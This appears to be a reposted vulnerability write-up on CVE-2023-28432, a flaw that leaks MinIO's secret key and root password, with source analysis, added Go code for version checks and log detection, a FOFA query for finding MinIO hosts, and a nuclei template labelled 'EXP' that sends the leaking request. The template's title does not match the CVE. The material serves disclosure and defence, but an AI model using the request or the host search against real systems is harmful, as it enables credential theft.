
CVE-2023-28432 - Global Quick Look

2023-03-24 14:14:04 Source: Bilibili


CVE-2023-28432

CVE-2023-28432 nuclei templates


Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
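The affected window above, expressed as a version check. This is an added example, not MinIO's or the template author's code: it parses MinIO's RELEASE.<timestamp> tag format and reports whether a given release of a distributed deployment falls between the first vulnerable tag (inclusive) and the fixed tag (exclusive).

```go
package main

import (
	"fmt"
	"time"
)

const (
	// A MinIO tag such as RELEASE.2023-03-20T20-16-18Z, written as Go's
	// reference time so that time.Parse can read real tags with it.
	releaseLayout = "RELEASE.2006-01-02T15-04-05Z"
	// Window taken from the advisory text above.
	firstVulnerable = "RELEASE.2019-12-17T23-16-33Z" // inclusive
	fixedRelease    = "RELEASE.2023-03-20T20-16-18Z" // exclusive
)

// ParseRelease turns a release tag into a time.Time so tags can be ordered.
// Anything after the timestamp (e.g. a hotfix suffix) is ignored.
func ParseRelease(tag string) (time.Time, error) {
	if len(tag) > len(releaseLayout) {
		tag = tag[:len(releaseLayout)]
	}
	return time.Parse(releaseLayout, tag)
}

// IsAffected reports whether a deployment running tag is inside the
// vulnerable window. Only distributed deployments expose the bootstrap
// peer API, so a single-node deployment is reported as not affected.
func IsAffected(tag string, distributed bool) (bool, error) {
	if !distributed {
		return false, nil
	}
	v, err := ParseRelease(tag)
	if err != nil {
		return false, fmt.Errorf("unrecognised MinIO release tag %q: %w", tag, err)
	}
	lo, _ := ParseRelease(firstVulnerable) // constants above, known to parse
	hi, _ := ParseRelease(fixedRelease)
	return !v.Before(lo) && v.Before(hi), nil
}

func main() {
	for _, tag := range []string{"RELEASE.2019-12-17T23-16-33Z", "RELEASE.2023-03-20T20-16-18Z"} {
		affected, err := IsAffected(tag, true)
		fmt.Printf("%s affected=%v err=%v\n", tag, affected, err)
	}
}
```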

Vulnerability info

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197

// Verify - fetches system server config.
func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) {
	if newObjectLayerFn() != nil {
		return nil
	}
	respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1)
	if err != nil {
		return
	}
	defer xhttp.DrainBody(respBody)
	recvCfg := ServerSystemConfig{}
	if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil {
		return err
	}
	return srcCfg.Diff(recvCfg)
}

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54

const (
	bootstrapRESTVersion       = "v1"
	bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion
	bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap"
	bootstrapRESTPath          = bootstrapRESTPrefix + bootstrapRESTVersionPrefix
)

const (
	bootstrapRESTMethodHealth = "/health"
	bootstrapRESTMethodVerify = "/verify"
)

// To abstract a node over network.
type bootstrapRESTServer struct{}

// ServerSystemConfig - captures information about server configuration.
type ServerSystemConfig struct {
	MinioEndpoints EndpointServerPools
	MinioEnv       map[string]string
}

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149

func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
	ctx := newContext(r, w, "VerifyHandler")
	if err := storageServerRequestValidate(r); err != nil {
		b.writeErrorResponse(w, err)
		return
	}
	cfg := getServerSystemCfg()
	logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}

// registerBootstrapRESTHandlers - register bootstrap rest router.
func registerBootstrapRESTHandlers(router *mux.Router) {
	server := &bootstrapRESTServer{}
	subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()
	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(httpTraceHdrs(server.HealthHandler))
	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(httpTraceHdrs(server.VerifyHandler))
}

# https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210

// SlashSeparator - slash separator.
const SlashSeparator = "/"

# https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138

const (
	minioReservedBucket              = "minio"
	minioReservedBucketPath          = SlashSeparator + minioReservedBucket
	minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparator
)

Putting the constants together gives the route of the unauthenticated verify handler:

SlashSeparator = "/"
minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /minio
bootstrapRESTPrefix = minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap
bootstrapRESTVersion = "v1"
bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1
bootstrapRESTMethodVerify = "/verify"
subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify

final path: POST /minio/bootstrap/v1/verify
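With the route pinned down, a defender's complement to the scanner template is to look for that request in access logs. This added example (not from the page or from MinIO) assumes a reverse proxy in front of MinIO writing combined-format access logs, uses constructed sample lines, and reports clients that are not cluster peers yet POSTed to the verify endpoint, with the status they received.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Route reconstructed above from the MinIO constants.
const bootstrapVerifyPath = "/minio/bootstrap/v1/verify"

// Combined-format access log line, as a reverse proxy in front of MinIO
// would write it (assumed deployment; MinIO itself does not emit this).
var combinedRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})`)

// Constructed sample: one cluster node calling a peer, one outside client
// that received the configuration (status 200), one that was refused.
var sampleLog = []string{
	`10.0.0.12 - - [24/Mar/2023:14:00:01 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 512`,
	`203.0.113.7 - - [24/Mar/2023:14:02:17 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 498`,
	`203.0.113.7 - - [24/Mar/2023:14:02:18 +0800] "GET /minio/health/live HTTP/1.1" 200 0`,
	`198.51.100.9 - - [24/Mar/2023:14:03:40 +0800] "POST /minio/bootstrap/v1/verify/ HTTP/1.1" 403 0`,
}

// SuspiciousVerifyClients returns clients that are not cluster peers yet
// POSTed to the verify endpoint, keyed by client with the HTTP status seen.
// A 200 for a non-peer means the environment (with secrets) was disclosed.
func SuspiciousVerifyClients(lines []string, peers []string) map[string]string {
	known := make(map[string]bool, len(peers))
	for _, p := range peers {
		known[p] = true
	}
	out := map[string]string{}
	for _, line := range lines {
		m := combinedRe.FindStringSubmatch(line)
		if m == nil || m[2] != "POST" || known[m[1]] {
			continue // unparsable, not a POST, or a legitimate peer
		}
		if strings.TrimSuffix(m[3], "/") == bootstrapVerifyPath {
			out[m[1]] = m[4] // status as logged
		}
	}
	return out
}

func main() {
	fmt.Println(SuspiciousVerifyClients(sampleLog, []string{"10.0.0.11", "10.0.0.12"}))
}
```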

fofa

app="minio"

EXP

id: CVE-2023-28432

info:
  name: Minio post policy request security bypass
  author: Mr-xn
  severity: high
  description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
    - https://github.com/minio/minio/pull/16853/files
    - https://github.com/golang/vulndb/issues/1667
    - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-28432
    cwe-id: CWE-200
  tags: cve,cve2023

requests:
  - raw:
      - |+
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"MinioEndpoints"'

      - type: word
        part: header
        words:
          - 'Content-Type: text/plain'

      - type: status
        status:
          - 200

nuclei

nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://target.com:port

reference:

https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

https://github.com/minio/minio/pull/16853/files

https://github.com/golang/vulndb/issues/1667

https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
